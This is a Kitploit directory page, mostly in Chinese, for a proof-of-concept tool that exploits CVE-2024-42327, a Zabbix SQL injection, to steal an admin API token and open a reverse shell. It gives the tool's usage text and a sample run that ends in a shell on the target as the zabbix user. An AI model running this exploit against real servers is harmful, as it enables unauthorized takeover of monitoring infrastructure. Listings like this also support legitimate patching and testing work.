Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-42327 — POC for CVE-2024-42327: Zabbix Privilege Escalation -> RCE | Kitploit
工具/GitHubGitHub/godylockz/cve-2024-42327
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubgodylockz/cve-2024-42327

CVE-2024-42327

POC for CVE-2024-42327: Zabbix Privilege Escalation -> RCE

查看仓库
921年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-42327:Zabbix 权限提升 -> 远程代码执行

描述

此概念验证(POC)可用于利用 CVE-2024-42327,泄露管理员 API 认证令牌,并创建一个条目以在 Zabbix 服务器 < 6.0.32rc1、6.4.17rc1、7.0.1rc1 上实现反向 shell。

Zabbix 前端上具有默认用户角色或任何其他具有 API 访问权限角色的非管理员用户账户可以利用此漏洞。在 CUser 类的 addRelatedObjects 函数中存在 SQL 注入,该函数从 CUser.get 函数调用,而任何具有 API 访问权限的用户均可访问该函数。

严重性:9.9 严重 向量:CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

使用方法

root@kitploit:~
usage: zabbix_privesc.py [-h] -t URL -u USERNAME -p PASSWORD [--listen-ip LISTEN_IP] [--listen-port LISTEN_PORT] [--threads THREADS] [--sleep-time SLEEP_TIME]
                         [--row ROW] [--length LENGTH] [-a USERAGENT] [-x PROXY] [-v]

POC for CVE-2024-42327 (Zabbix admin API token leak)

options:
  -h, --help            show this help message and exit
  -t, --url URL         Zabbix Target URL
  -u, --username USERNAME
                        Zabbix username
  -p, --password PASSWORD
                        Zabbix password
  --listen-ip LISTEN_IP
                        Listening IP / Interface
  --listen-port LISTEN_PORT
                        Listening Port
  --threads THREADS     Threads
  --sleep-time SLEEP_TIME
                        Sleep time
  --row ROW             Row index
  --length LENGTH       Max length
  -a, --useragent USERAGENT
                        User agent to use when sending requests
  -x, --proxy PROXY     HTTP(s) proxy to use when sending requests (i.e. -p http://127.0.0.1:8080)
  -v, --verbose         Verbosity enabled - additional output flag

示例

root@kitploit:~
python3 zabbix_privesc.py -t https://TARGET/zabbix/ -u USER -p PASSWORD
[*] 正在验证身份 ...
[+] 登录成功!USER API 认证令牌:d0a05dfe4ce768f62e22bda4057c7c19
[*] 开始数据提取 ...
[*] 提取管理员 API 认证令牌:af186c156b27a0c3f688b43f58c911c9
[*] 获取主机 ID ...
[*] host.get 响应:{'jsonrpc': '2.0', 'result': [{'hostid': '10084', 'host': 'Zabbix server', 'interfaces': [{'interfaceid': '1'}]}], 'id': 1}
[*] 启动监听器并发送反向 shell ...
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from X.X.X.X:51004.
zabbix@target:/$ id
uid=114(zabbix) gid=121(zabbix) groups=121(zabbix)

参考资料

  • Zabbix 支持
  • NIST CVE-2024-42327
下载工具